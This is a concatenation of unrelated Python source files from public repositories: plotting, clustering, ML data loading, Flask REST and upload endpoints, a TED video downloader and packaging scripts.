    # file_name: "../../nnlib/robustness/2019-09-11-21-11-34-525829-len-32-adv-images-eigenvals",
    # file_name: "../../nnlib/robustness/2019-09-12-09-15-11-050891-len-32-gauss-images-eigenvals",
    # file_name: "../../nnlib/robustness/2019-09-12-09-39-58-229856-len-1-gauss_recovered-images-eigenvals",
    # file_name: "../../nnlib/robustness/2019-09-12-15-52-21-874077-len-5-gauss-images-eigenvals-min-avg-max",
    # file_name: "../../nnlib/robustness/2019-09-12-16-03-19-886454-len-17-gauss-images-eigenvals-confidence",
    file_name: "../../nnlib/robustness/2019-09-12-10-28-45-374723-len-62-gauss-images-highest_eigenvalues",
    title: "gauss",
    # legend_pos: "lower left",
    legend_pos: "upper right",
    # bbox: (0.0, 0.0),
    column_nr: 3,
    row_nr: 1,
    legend_cols: 3,
    labels: ['gauss'],
    xlim: (0, 100),
    ylim: (0, 100)}
# Per-curve style cycles (indexed by dataset position).
colors = [get_color(color) for color in
          [MY_GREEN, MY_BLUE, MY_ORANGE, MY_RED, MY_BLACK, MY_GOLD]]
markers = ["+", "o", "v", "s", "D", "^", "+"]
linestyles = [":", "-", "--", ":", "-", "--", ":", "-"]
datasets = [
    original,
    adversarial,
    gauss,
]
# width = 12
# height = 5
# lw = 3
fig_size = 10
width = 18
height = 10
line_width = 4
markersize = 20
layout = "horizontal"  # "horizontal" or "vertical"
fig = plt.figure(figsize=(len(datasets) * width, height))
xlen = 20
indexing = []
# One curve per dataset: read the selected data row (highest eigenvalue per
# image) and plot it against the 1-based image index.
for j, dataset in enumerate(datasets):
    print("dataset: ", dataset)
    rows = read_rows(dataset[file_name], row_nr=dataset[row_nr])
    row = rows[0]
    print(f"row {j}: ", row)
    eigenvalues = row
    # eigenvalues.sort(reverse=True)
    xlen = len(eigenvalues)
    indexing = [i + 1 for i in range(xlen)]
    plt.plot(indexing,
             eigenvalues,
             label=dataset[labels][0],
             lw=line_width,
             color=colors[j],
             linestyle=linestyles[j],
             # linestyle='None',
             marker=markers[j % len(markers)],
             markersize=markersize)
# 0/1 flag per image, plotted as red dots on the same axes.
# NOTE(review): presumably 1 means the image was successfully recovered —
# confirm against the producing experiment.
is_recovered = [1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0, 1, 1, 1,
                1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 0, 1, 1, 0, 1, 0, 1, 1, 1, 1,
                1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1]
plt.plot(indexing, is_recovered, label='is recovered', linestyle='', marker='o',
         markersize=markersize+2, color='red')
plt.grid()
plt.legend( # loc='upper right',
    loc='center left',
    ncol=1,
    frameon=False,
    prop={'size': legend_size},
    title='Image type:',
    # bbox_to_anchor=dataset[bbox]
)
plt.ylabel('eigenvalue (value)')
plt.xlabel('image index')
plt.xticks(indexing)
plt.yscale('log', basey=2)  # log2 y-axis: eigenvalues span orders of magnitude
plt.title(f'Highest eigenvalues of Hessians w.r.t. {wrt} for 62 images',
          fontsize=title_size)
# plt.ylim((0,20))
# plt.xlim((0, xlen))
# plt.gcf().autofmt_xdate()
# plt.xticks(rotation=0)
# plt.interactive(False)
# plt.imshow()
# plt.subplots_adjust(hspace=0.3)
format = "pdf"  # "pdf" or "png"
destination = dir_path + "/" + f"highest_eigenvalues_9_log." + format
print("destination: ", destination)
fig.savefig(destination,
            bbox_inches='tight',
            # transparent=True
            )
# plt.show(block=False)
# plt.interactive(False)
plt.close()
| 7,325 |
vendor-local/src/django-valet-keys/setup.py
|
Mozilla-GitHub-Standards/32efa1a1fe75882ab357bdb58d92207732a76c86f080bb0f12b4b3357b38899d
| 1 |
2022691
|
#!/usr/bin/env python
# Packaging script for django-valet-keys.
from setuptools import setup
# NOTE(review): importing multiprocessing up front is a known workaround for
# a crash at interpreter shutdown when running tests under nose (listed in
# tests_require below) — confirm it is still needed.
try:
    import multiprocessing
except ImportError:
    pass
setup(
    name='django-valet-keys',
    version='0.0.1',
    description='Django app for managing valet keys for robots',
    long_description=open('README.rst').read(),
    author='<NAME>',
    author_email='<EMAIL>',
    url='http://github.com/lmorchard/django-valet-keys',
    license='BSD',
    packages=['valet_keys'],
    package_data={},
    classifiers=[
        'Development Status :: 4 - Beta',
        'Framework :: Django',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: BSD License',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Topic :: Software Development :: Libraries :: Python Modules',
    ],
    install_requires=[
        'django>=1.4',
    ],
    tests_require=[
        'nose',
        'django-nose',
        'pyquery',
        'feedparser',
    ],
    test_suite='manage.nose_collector',
)
| 1,013 |
5_clusters_basico_ao_avancado/main.py
|
kayua/Introducao-Machine-Learning
| 3 |
2024375
|
# Library for reading CSV files
from pandas import read_csv
# sklearn dependencies
from sklearn.cluster import KMeans
from sklearn.cluster import MeanShift
from sklearn.cluster import DBSCAN
from sklearn.cluster import OPTICS
from sklearn.cluster import AgglomerativeClustering
from sklearn.mixture import GaussianMixture
# Load the table data: columns 1-4 are the iris features, column 0 the label.
dados_tabela = read_csv('tabela/dataset_iris.csv', usecols=[1, 2, 3, 4], engine='python')
rotulos = read_csv('tabela/dataset_iris.csv', usecols=[0], engine='python')
conjunto_de_dados = dados_tabela.values
rotulos = rotulos.values
# Convert features to float32 and labels to int32.
conjunto_de_dados = conjunto_de_dados.astype('float32')
rotulos = rotulos.astype('int32')
# Slice of the data (currently the full range).
dados_para_predicao = conjunto_de_dados[0:len(conjunto_de_dados), :]
rotulos = rotulos[0:len(rotulos), :]
# Below are some well-known clustering algorithms.
# To use one of them, uncomment the desired line and comment out the others.
# https://scikit-learn.org/stable/modules/clustering.html#clustering
resultados = KMeans(n_clusters=3, random_state=10).fit_predict(dados_para_predicao)
#resultados = MeanShift(0.8).fit_predict(dados_para_predicao)
#resultados = AgglomerativeClustering(n_clusters=3, affinity='euclidean').fit_predict(dados_para_predicao)
#resultados = DBSCAN(0.7).fit_predict(dados_para_predicao)
#resultados = OPTICS(min_samples=20, xi=.05, min_cluster_size=.05).fit_predict(dados_para_predicao)
#resultados = GaussianMixture(n_components=3, covariance_type='full').fit_predict(dados_para_predicao)
# Print the true label next to the predicted cluster for each sample.
for i in range(len(resultados)):
    print('Flor id: ', rotulos[i][0], " predicao: ", resultados[i])
| 1,694 |
src/largest50/models/random/truly_random.py
|
vam-sin/CATHe
| 2 |
2023149
|
# Random-prediction baseline for the top-50 superfamily (SF) classification
# task, with bootstrap estimates of accuracy, macro-F1, MCC and balanced acc.
import pandas as pd
import random
import pickle
import numpy as np
from sklearn.utils import resample
from sklearn.metrics import confusion_matrix, accuracy_score, f1_score, classification_report, matthews_corrcoef, balanced_accuracy_score
# dataset import: the list of the 50 most frequent superfamilies
infile = open('../../data/final/top50.pickle','rb')
top50 = pickle.load(infile)
infile.close()
# train: keep only samples whose SF is in the top 50
ds_train = pd.read_csv('../../../all/data/final/Train.csv')
y_train_full = list(ds_train["SF"])
print(len(y_train_full))
train_index = ds_train.index[ds_train['SF'].isin(top50)].tolist()
train_sf = [y_train_full[k] for k in train_index]
# test: same filtering for the test labels
ds_test = pd.read_csv('../../../all/data/final/Test.csv')
y_test_full = list(ds_test["SF"])
test_index = ds_test.index[ds_test['SF'].isin(top50)].tolist()
y_test = [y_test_full[k] for k in test_index]
acc = []
f1 = []
mcc = []
ba = []
num_iter = 1000  # number of bootstrap iterations
for j in range(num_iter):
    print(j)
    y_pred = []
    # NOTE(review): random_state is fixed at 42, so every iteration draws the
    # SAME bootstrap sample of y_test; only the random predictions vary.
    # Confirm whether random_state should depend on j instead.
    y_test_resample = resample(y_test, n_samples = len(y_test), random_state = 42)
    for i in range(len(y_test_resample)):
        y_pred.append(random.choice(train_sf))
    acc.append(accuracy_score(y_test_resample, y_pred))
    f1.append(f1_score(y_test_resample, y_pred, average='macro'))
    mcc.append(matthews_corrcoef(y_test_resample, y_pred))
    ba.append(balanced_accuracy_score(y_test_resample, y_pred))
# Mean and standard deviation of each metric over all iterations.
print(np.mean(acc), np.std(acc))
print(np.mean(f1), np.std(f1))
print(np.mean(mcc), np.std(mcc))
print(np.mean(ba), np.std(ba))
# cr = classification_report(y_test, y_pred, digits=4)
# print(cr)
'''
0.02684994861253854 0.0036400137026782057
0.01607407095107804 0.002817064088301045
-9.889507646715503e-05 0.0037323095376247998
0.020449992270371805 0.005722759969054513
'''
| 1,686 |
lbt/metrics/__init__.py
|
skanjila/ludwig-benchmarking-toolkit
| 9 |
2024526
|
from lbt.metrics.base_metric import LBTMetric
import ray
import importlib
import sys
import json
import os
# Directory of this package; used to locate the bundled price table.
LOCATION = os.path.abspath(os.path.dirname(__file__))
INSTANCE_PRICES_FILEPATH = os.path.join(LOCATION, "instance_prices.json")
METRIC_REGISTERY = {}  # name -> LBTMetric subclass (populated by @register_metric)
INSTANCE_PRICES = {}  # overwritten at import time with instance_prices.json contents
def register_metric(name):
    """Class decorator that registers an LBTMetric subclass under `name`.

    Example:
        @register_metric('personal_metric')
        class PersonalMetric(LBTMetric):
            ...

    Args:
        name (str): key under which the class is stored in METRIC_REGISTERY.

    Raises:
        ValueError: if the decorated class does not extend LBTMetric.
    """
    def register_metric_cls(cls):
        if not issubclass(cls, LBTMetric):
            raise ValueError(
                "Metric ({}: {}) must extend lbt.metrics.base_metric".format(
                    name, cls.__name__
                )
            )
        METRIC_REGISTERY[name] = cls
        return cls
    return register_metric_cls
def get_experiment_metadata(
    document: dict,
    model_path: str,
    data_path: str,
    run_stats: dict,
    num_gpus=0,
    train_batch_size: int = 16,
):
    """Populate `document` with one entry per registered metric.

    Each registered metric class is instantiated as a Ray actor (1 CPU,
    `num_gpus` GPUs) and its `run` method is invoked remotely; the result is
    stored in `document` under the metric's registry key. A failing metric is
    reported and skipped so it does not abort the remaining metrics.
    """
    for key, metrics_class in METRIC_REGISTERY.items():
        try:
            remote_class = ray.remote(num_cpus=1, num_gpus=num_gpus)(
                metrics_class
            ).remote()
            output = remote_class.run.remote(
                model_path=model_path,
                dataset_path=data_path,
                train_batch_size=train_batch_size,
                run_stats=run_stats,
            )
            document.update({key: ray.get(output)})
        # Bug fix: a bare `except:` also swallowed SystemExit and
        # KeyboardInterrupt and hid the failure reason entirely.
        except Exception as exc:
            print(f"FAILURE PROCESSING: {key}")
            print(exc)
# Load the per-instance-type price table shipped with the package.
INSTANCE_PRICES = json.load(open(INSTANCE_PRICES_FILEPATH, "rb"))
PRE_BUILT_METRICS = {
    "lbt_metrics": "lbt.metrics.lbt_metrics",
}
# Import the bundled metric modules so their @register_metric decorators run.
for name, module in PRE_BUILT_METRICS.items():
    if module not in sys.modules:
        # NOTE(review): the hard-coded module name ignores the `module` loop
        # variable — correct for the single current entry, but verify if more
        # prebuilt modules are added.
        importlib.import_module("lbt.metrics.lbt_metrics")
| 1,895 |
raspador/bot_maneuver.py
|
xyla-io/raspador
| 0 |
2022780
|
import json
import importlib
from pathlib import Path
from typing import Optional, Dict, Callable
from io_map import IOMap
from .maneuver import Maneuver, OrdnanceManeuver
from .pilot import Pilot
from .raspador import Raspador
from .user_interactor import UserInteractor
from .browser_interactor import BrowserInteractor
from .error import RaspadorBotError
class BotManeuver(OrdnanceManeuver[Pilot, Raspador]):
  """Run another bot (loaded by module name) as a sub-maneuver.

  Loads the bot's JSON configuration, instantiates `<bot_name>.Bot`, runs its
  scrape, merges the bot's flight log into the enclosing scraper's log, and
  re-raises any error the bot recorded.
  """
  bot_name: Optional[str]  # module name of the bot to run
  configuration_name: str  # selects <bot>_configuration_<name>.json
  configuration: Dict[str, any]  # overrides merged on top of the file config
  browser: Optional[BrowserInteractor]  # explicit browser; falls back to pilot's
  user: Optional[UserInteractor]  # explicit user; falls back to a configured copy of pilot's
  clear_context: bool  # clear IOMap local registries while the bot runs

  def __init__(self, bot_name: Optional[str]=None, configuration_name: Optional[str]='default', configuration: Dict[str, any]={}, browser: Optional[BrowserInteractor]=None, user: Optional[UserInteractor]=None, clear_context: bool=True):
    # Note: the shared {} default is safe here because `configuration` is only
    # ever read (merged into a fresh dict in attempt()), never mutated.
    self.bot_name = bot_name
    self.configuration_name = configuration_name
    self.configuration = configuration
    self.browser = browser
    self.user = user
    self.clear_context = clear_context
    super().__init__()

  def attempt(self, pilot: Pilot, fly: Callable[[Maneuver], Maneuver], scraper: Raspador):
    """Load config, run the bot, merge its flight log, surface its error."""
    configuration_path = Path(__file__).parent.parent / 'configurations' / f'{self.bot_name}_configuration' / f'{self.bot_name}_configuration_{self.configuration_name}.json'
    configuration = json.loads(configuration_path.read_bytes()) if configuration_path.exists() else {}
    configuration.update(self.configuration)
    module = importlib.import_module(self.bot_name)
    # Bug fix: `bot` was first assigned inside the try block, so if Bot()
    # itself raised, the finally clause hit a NameError that masked the
    # original exception. Pre-initialize and guard the cleanup instead.
    bot: Optional[Raspador] = None
    try:
      with IOMap._local_registries(clear=self.clear_context):
        bot = module.Bot(
          browser=pilot.browser if self.browser is None else self.browser,
          user=self.user,
          configuration=configuration,
          interactive=pilot.user.interactive if self.user is None else None
        )
        if self.user is None:
          self.configure_user(
            source_user=pilot.user,
            target_user=bot.user
          )
        bot.scrape()
    finally:
      # Only quit a browser this maneuver supplied itself; the pilot's own
      # browser must stay open for subsequent maneuvers.
      if self.browser is not None and bot is not None:
        bot.browser.driver.quit()
    bot_log = bot.flight_logs[-2]
    scraper.flight_logs[-1] = scraper.flight_logs[-1].append(bot_log)
    bot_error = bot_log.iloc[-1].error
    if bot_error:
      raise RaspadorBotError(
        bot=bot,
        bot_error=bot_error
      )
    self.load(bot)

  def configure_user(self, source_user: UserInteractor, target_user: UserInteractor):
    """Copy interaction settings from the pilot's user onto the bot's user."""
    target_user.interactive = source_user.interactive
    target_user.control_mode = source_user.control_mode
    target_user.timeout = source_user.timeout
    target_user.abbreviated_length = source_user.abbreviated_length
    target_user.break_on_exceptions = source_user.break_on_exceptions
    target_user.monitor = source_user.monitor
    target_user.retry = source_user.retry
| 2,836 |
f3dasm/tests/abaqus/example_step.py
|
bessagroup/F3DASM
| 26 |
2022746
|
'''
Created on 2020-04-08 15:42:58
Last modified on 2020-09-30 11:37:54
@author: <NAME> (<EMAIL>)
Main goal
---------
Show how to create step using the classes defined in abaqus.modelling
'''
# imports
# abaqus
from abaqus import mdb, backwardCompatibility
# third-party
from f3dasm.abaqus.modelling.step import BuckleStep
# initialization
# Silence warnings about deprecated Abaqus API usage.
backwardCompatibility.setValues(reportDeprecated=False)
model_name = 'TEST-STEPS'
job_name = 'Sim_' + model_name
job_description = ''
# define materials
step_name = 'TEST_STEP'
# create model (and drop the auto-created default model)
model = mdb.Model(name=model_name)
if 'Model-1' in mdb.models.keys():
    del mdb.models['Model-1']
# create step
new_step = BuckleStep(step_name)
new_step.create_step(model)
| 725 |
web_api/yonyou/resources/sale_delivery.py
|
zhanghe06/flask_restful
| 1 |
2023422
|
#!/usr/bin/env python
# encoding: utf-8
"""
@author: zhanghe
@software: PyCharm
@file: sale_delivery.py
@time: 2018-07-24 16:58
"""
from __future__ import unicode_literals
from flask import jsonify, make_response
from flask_restful import Resource, marshal, reqparse
from web_api.yonyou.outputs.sale_delivery import fields_item_sale_delivery, fields_item_sale_delivery_cn
from web_api.yonyou.reqparsers.sale_delivery import (
structure_key_item,
structure_key_items,
structure_key_item_cn,
structure_key_items_cn,
)
from web_api.commons.exceptions import BadRequest, NotFound
from web_api.yonyou.apis.sale_delivery import (
get_sale_delivery_row_by_id,
edit_sale_delivery,
delete_sale_delivery,
get_sale_delivery_limit_rows_by_last_id,
add_sale_delivery,
get_sale_delivery_pagination,
)
from web_api.commons.http_token_auth import token_auth
from web_api import app
# Canned response payloads shared by all resources (always .copy() before use).
SUCCESS_MSG = app.config['SUCCESS_MSG']
FAILURE_MSG = app.config['FAILURE_MSG']
class SaleDeliveryResource(Resource):
    """Single sale-delivery endpoint: fetch by id, delete by id."""
    decorators = [token_auth.login_required]

    def get(self, pk):
        """Return one sale delivery (CN field names) or 404.

        Example:
            curl http://0.0.0.0:5000/yonyou/sale_delivery/1
        """
        row = get_sale_delivery_row_by_id(pk)
        if not row:
            raise NotFound
        payload = marshal(row, fields_item_sale_delivery_cn, envelope=structure_key_item_cn)
        return jsonify(payload)

    def delete(self, pk):
        """Delete one sale delivery; 204 on success, 400 on failure.

        Example:
            curl http://0.0.0.0:5000/yonyou/sale_delivery/1 -X DELETE
        """
        if delete_sale_delivery(pk):
            return make_response(jsonify(SUCCESS_MSG.copy()), 204)
        return make_response(jsonify(FAILURE_MSG.copy()), 400)
class SaleDeliveryListResource(Resource):
    """Keyset-paginated list endpoint for sale deliveries."""
    decorators = [token_auth.login_required]

    def get(self):
        """Return up to `limit_num` sale deliveries after id `last_pk`.

        Example:
            curl http://0.0.0.0:5000/yonyou/sale_deliveries
            curl http://0.0.0.0:5000/yonyou/sale_deliveries?last_pk=1000&limit_num=2
        """
        # Query-string parameters.
        parser = reqparse.RequestParser(bundle_errors=True)
        parser.add_argument('last_pk', type=int, default=0, location='args')
        parser.add_argument('limit_num', type=int, default=20, location='args')
        args = parser.parse_args()
        rows = get_sale_delivery_limit_rows_by_last_id(**args)
        payload = marshal(rows, fields_item_sale_delivery_cn, envelope=structure_key_items_cn)
        return jsonify(payload)
class SaleDeliveryPaginationResource(Resource):
    """Offset-paginated list endpoint for sale deliveries."""
    decorators = [token_auth.login_required]

    def get(self):
        """Return one page of sale deliveries plus the total row count.

        Example:
            curl http://0.0.0.0:5000/yonyou/sale_deliveries/pagination
            curl http://0.0.0.0:5000/yonyou/sale_deliveries/pagination?page=2000&per_page=2
        """
        # Query-string parameters.
        parser = reqparse.RequestParser(bundle_errors=True)
        parser.add_argument('page', type=int, default=1, location='args')
        parser.add_argument('per_page', type=int, default=20, location='args')
        args = parser.parse_args()
        pagination_obj = get_sale_delivery_pagination(**args)
        payload = marshal(pagination_obj.items, fields_item_sale_delivery, envelope=structure_key_items)
        payload['total'] = pagination_obj.total
        return jsonify(payload)
| 3,823 |
age_gender/utils/dataloader.py
|
RomanSteinberg/age-gender
| 1 |
2023649
|
import os
import json
import cv2
import tensorflow as tf
from pathlib import Path
from age_gender.utils.dataset_json_loader import DatasetJsonLoader
class DataLoader:
    """Builds tf.data pipelines yielding (image, age, gender, file_path)."""
    def __init__(self, dataset_json, data_folder):
        """
        Args:
            dataset_json (list): parsed JSON dataset description; each item
                carries 'age', 'gender' and 'file_name' keys.
            data_folder (string): root folder that file names are relative to.
        """
        self.image_shape = [256, 256, 3]
        self.data_folder = data_folder
        self.description = dataset_json
    def _parse_function(self, sample):
        """
        Parses dict into objects and labels.
        Args:
            sample (dict): object description.
        Returns (tuple):
            Tuple which contains age, gender and the joined file path.
        """
        # Convert label from a scalar uint8 tensor to an int32 scalar.
        age = sample['age']
        gender = sample['gender']
        file_path = sample['file_name']
        return age, gender, os.path.join(self.data_folder, file_path)
    def _generator(self):
        # Lazily yields (age, gender, path) tuples for Dataset.from_generator.
        for sample in self.description:
            yield self._parse_function(sample)
    def _read_image(self, age, gender, file_path):
        # Decode the image, fix its static shape, reverse the channel order
        # and rescale pixel values from [0, 255] to [-1, 1].
        image_string = tf.read_file(file_path)
        image_tn = tf.image.decode_image(image_string, channels=3)
        image_tn.set_shape([None, None, 3])  # important!
        image_tn = tf.reshape(image_tn, self.image_shape)
        image_tn = tf.reverse(image_tn, [-1])  # swap channel order (RGB<->BGR)
        # image_tn = tf.image.per_image_standardization(image_tn)
        image_tn = tf.math.subtract(tf.math.divide(
            tf.cast(image_tn, dtype=tf.float32), tf.constant(127.5)), tf.constant(1.0))
        return image_tn, age, gender, file_path
    def create_dataset(self, perform_shuffle=False, repeat_count=1, batch_size=1, num_prefetch=None,
                       num_parallel_calls=None):
        """
        Creates tf.data.Dataset object.
        Args:
            perform_shuffle (bool): specifies whether it is necessary to shuffle.
            repeat_count (int): specifies number of dataset repeats.
            batch_size (int): specifies batch size.
            num_prefetch (int): optional prefetch buffer size.
            num_parallel_calls (int): optional parallelism for the decode map.
        Returns (tuple):
            Tuple which contains images batch and corresponding batches of age labels, gender labels and file names.
        """
        dataset = tf.data.Dataset.from_generator(
            self._generator,
            (tf.int32, tf.int32, tf.string)
        )
        if num_parallel_calls is not None:
            dataset = dataset.map(
                self._read_image, num_parallel_calls=num_parallel_calls)
        else:
            dataset = dataset.map(self._read_image)
        if perform_shuffle:
            # Randomizes input using a window of 256 elements (read into memory)
            dataset = dataset.shuffle(
                buffer_size=256, reshuffle_each_iteration=True)
        dataset = dataset.batch(batch_size)
        if num_prefetch is not None:
            dataset = dataset.prefetch(num_prefetch)
        return dataset.repeat(repeat_count)
    def dataset_len(self):
        # Number of samples described by the dataset JSON.
        return len(self.description)
def init_data_loader(batch_size, desc_path, images_path, balance_config=None, min_size=None, epochs=None,
                     num_prefetch=None, num_parallel_calls=None):
    """Build a reinitializable iterator over the dataset described at desc_path.

    Args:
        batch_size: batch size.
        desc_path: path to the JSON dataset description.
        images_path: root folder for the image files.
        balance_config: optional config for DatasetJsonLoader rebalancing.
        min_size: if given and the dataset is smaller, repeat it until at
            least min_size samples are produced.
        epochs: if given, overrides the computed repeat count entirely.
        num_prefetch / num_parallel_calls: forwarded to create_dataset.

    Returns:
        (next_data_element, init_op, dataset_length)
    """
    print('desc_path', desc_path)
    desc = json.load(Path(desc_path).open())
    if balance_config is not None:
        dataset_json_loader = DatasetJsonLoader(
            balance_config, desc)
        desc = dataset_json_loader.get_dataset()
    loader = DataLoader(desc, images_path)
    repeat_count = 1
    if min_size is not None and loader.dataset_len() < min_size:
        # Ceiling division of min_size by the dataset length.
        # Bug fix: the original added `dataset_len() % min_size != 0`, whose
        # operands are swapped; since dataset_len < min_size that term was
        # always 1, over-repeating exactly-divisible datasets by one epoch.
        repeat_count = -(-min_size // loader.dataset_len())
    if epochs is not None:
        repeat_count = epochs
    dataset = loader.create_dataset(
        perform_shuffle=True,
        batch_size=batch_size,
        repeat_count=repeat_count,
        num_prefetch=num_prefetch,
        num_parallel_calls=num_parallel_calls
    )
    iterator = tf.data.Iterator.from_structure(dataset.output_types, dataset.output_shapes)
    next_data_element = iterator.get_next()
    init_op = iterator.make_initializer(dataset)
    return next_data_element, init_op, loader.dataset_len()
def visual_validation(config):
    """Visually validate DataLoader output by dumping images to disk.

    Saves decoded batches plus the corresponding original files into
    experiments/test/<epoch>/ for side-by-side comparison. Note that
    per_image_standardization transforms images in a way that is hard to
    invert for viewing, so run this with that transform disabled in
    DataLoader.

    Args:
        config (dict): configuration dictionary.

    Returns:
        None
    """
    dataset_path = config['init']['dataset_path']
    face_area_threshold = config['face_area_threshold']  # NOTE(review): unused here
    folder = os.path.join(config['working_dir'], 'experiments/test')
    batch_size = 3
    epochs = 2
    # NOTE(review): DataLoader.__init__ takes (dataset_json, data_folder);
    # this single-argument call looks stale — confirm against DataLoader.
    dataset = DataLoader(dataset_path).create_dataset(True, epochs, batch_size)
    iterator = dataset.make_one_shot_iterator()
    all_tn = iterator.get_next()
    # Bug fix: the original wrote `with tf.Graph().as_default() and
    # tf.Session() as sess:` — `and` evaluates (and discards) the graph
    # context manager, so it was never entered. The ops above live on the
    # current default graph, so a plain Session over it is what is needed.
    with tf.Session() as sess:
        for ep in range(epochs):
            all_data = sess.run(all_tn)
            ep_folder = os.path.join(folder, f'{ep}')
            os.makedirs(ep_folder, exist_ok=True)
            for i, data_piece in enumerate(zip(*all_data)):
                print(data_piece[0].dtype)
                print(i, data_piece[1], data_piece[2], data_piece[3])
                p = os.path.join(folder, f'{ep}/result{i}.jpg')
                cv2.imwrite(p, data_piece[0])
                img = cv2.imread(data_piece[3].decode('utf-8'))
                p = os.path.join(folder, f'{ep}/original{i}.jpg')
                cv2.imwrite(p, img)
| 5,701 |
main.py
|
kartikgole/BlueMix1
| 0 |
2024563
|
#https://github.com/altmanWang/IBM-DB2/blob/master/Insert.py
# Flask app that bulk-loads an uploaded earthquake CSV into IBM DB2.
import csv
import io
from flask import Flask, render_template, request
import time
app = Flask(__name__)
import ibm_db_dbi
# Connection string is redacted; fill in host/credentials before running.
cnxn = ibm_db_dbi.connect("#####;", "", "")
if cnxn:
    print('database connected')
@app.route('/')
def index():
    """Serve the CSV upload form."""
    return render_template('index.html')
@app.route('/upload', methods=['POST', 'GET'])
def insert_table():
    """Create the equake1 table (if needed) and bulk-insert an uploaded CSV.

    Reads the CSV from the 'data_file' form field, skips its header row,
    inserts each data row with a parameterized statement, and re-renders the
    page with the elapsed time.
    """
    cursor = cnxn.cursor()
    start_time = time.time()
    # Bug fix: CREATE TABLE ran unguarded on every request, so any upload
    # after the first crashed once the table already existed. Treat the
    # failure as "table already there" and carry on.
    try:
        cursor.execute("CREATE TABLE equake1(time varchar(50), latitude float(20), longitude float(50), depth float(50), mag float(50), magType varchar(50), nst int, gap int, dmin float(50), rms float(50),net varchar (50), id varchar(50), updated varchar(50), place varchar(50),type varchar(50),horizontal float(50), depthError float(50), magError float(50), magNst int,status varchar (50), locationSource varchar(50), magSource varchar(50))")
        cnxn.commit()
    except Exception as e:
        print(e)
        cnxn.rollback()
    if request.method == 'POST':
        f = request.files['data_file']
        if not f:
            return "No file"
        stream = io.StringIO(f.stream.read().decode("UTF8"), newline=None)
        csv_input = csv.reader(stream)
        next(csv_input)  # skip the header row
        for row in csv_input:
            print(row)
            try:
                # Parameterized insert — values are bound, never interpolated.
                cursor.execute(
                    "INSERT INTO equake1(time, latitude, longitude, depth, mag, magType, nst, gap, dmin, rms, net, id, updated, place, type, horizontal, depthError, magError, magNst, status, locationSource, magSource) VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)",row)
                cnxn.commit()
            except Exception as e:
                print(e)
                cnxn.rollback()
    end_time = time.time()
    time_diff = end_time - start_time
    return render_template('index.html',timesdiff = time_diff)
if __name__ == '__main__':
app.run(debug = True)
| 1,851 |
platforms/ted.py
|
DeathGodBXX/Video-Downloader
| 2 |
2022989
|
'''
Function:
TED演讲视频下载: https://www.ted.com/talks?language=zh-cn
Author:
Charles
微信公众号:
Charles的皮卡丘
'''
import re
import json
import requests
from utils.utils import *
requests.packages.urllib3.disable_warnings()
'''
Input:
--url: 视频地址
--savepath: 视频下载后保存的路径
Output:
--is_success: 下载是否成功的BOOL值
'''
class ted():
    """TED talk video downloader (https://www.ted.com/talks?language=zh-cn).

    Input:
        --url: address of the talk page
        --savepath: folder the downloaded video is saved into
    Output:
        --is_success: bool, whether the download succeeded
    """
    def __init__(self):
        self.headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'
        }
    def get(self, url, savepath='videos'):
        """External entry point: download the talk at `url` into `savepath`."""
        video_infos = self.__getvideoinfos(url)
        is_success = self.__download(video_infos, savepath)
        return is_success
    def __download(self, video_infos, savepath):
        """Download the video file; returns False on any failure."""
        checkFolder(savepath)
        download_url = video_infos[0]
        video_name = 'ted_' + video_infos[1] + '.mp4'
        try:
            is_success = downloadBASE(url=download_url, savename=video_name, savepath=savepath, headers=self.headers, stream=True, verify=False)
        # Narrowed from a bare `except:` so Ctrl-C still interrupts.
        except Exception:
            is_success = False
        return is_success
    def __getvideoinfos(self, url):
        """Scrape the talk page for the best download URL and the title."""
        res = requests.get(url, headers=self.headers)
        temp = '{' + re.findall(r'"__INITIAL_DATA__"\s*:\s*\{(.+)\}', res.text)[0]
        temp_json = json.loads(temp)
        title = temp_json['talks'][0]['title']
        if not title:
            title = 'vid' + str(temp_json['talks'][0]['downloads']['id'])
        videos_dict = temp_json['talks'][0]['downloads']['nativeDownloads']
        # Pick the best quality available.
        # Bug fix: download_url was unbound (NameError) when none of the
        # qualities existed; default to None so __download fails gracefully.
        download_url = None
        for quality in ['high', 'medium', 'low']:
            if quality in videos_dict:
                download_url = videos_dict[quality]
                break
        video_infos = [download_url, title]
        return video_infos
'''test'''
if __name__ == '__main__':
url = 'https://www.ted.com/talks/glenn_cantave_how_augmented_reality_is_changing_activism?language=zh-tw'
ted().get(url, savepath='videos')
| 1,802 |
osmdjango/media/cartocssMaker/node_modules/grainstore/node_modules/millstone/node_modules/zipfile/deps/compress.py
|
lzxleslie/HighGis_Django
| 0 |
2023088
|
# hg clone http://hg.nih.at/libzip
# mv libzip libzip-0.11.1
# python ./compress.py libzip-0.11.1-mod2.tar.gz libzip-0.11.1
# Pack a directory into a gzipped tarball.
# Usage: compress.py <output.tar.gz> <directory>
import sys
import tarfile
import os
tarball = os.path.abspath(sys.argv[1])
dirname = sys.argv[2]
# `with` guarantees the archive is flushed and closed even if add() fails
# (the original leaked the handle on error).
with tarfile.open(tarball, 'w:gz') as tfile:
    tfile.add(dirname)
sys.exit(0)
| 304 |
programs/genesis_util/generate_account_patch.py
|
JIG902/graphene
| 1,189 |
2024599
|
#!/usr/bin/env python3
import argparse
import json
import subprocess
import sys
def dump_json(obj, out, pretty):
    """Serialize `obj` to the file-like `out` with sorted keys.

    `pretty` selects 2-space indented output; otherwise the most compact
    separators are used.
    """
    kwargs = {"indent": 2} if pretty else {"separators": (",", ":")}
    json.dump(obj, out, sort_keys=True, **kwargs)
def main():
    """CLI entry point: read an accounts JSON file, derive deterministic dev
    keys for each account via programs/genesis_util/get_dev_key, and emit a
    genesis patch appending initial_accounts (and any initial_balances)."""
    parser = argparse.ArgumentParser(description="Generate a patch file that adds init accounts")
    parser.add_argument("-o", "--output", metavar="OUT", default="-", help="output filename (default: stdout)")
    parser.add_argument("-a", "--accounts", metavar="ACCOUNTS", default="-", help="file containing name, balances to create")
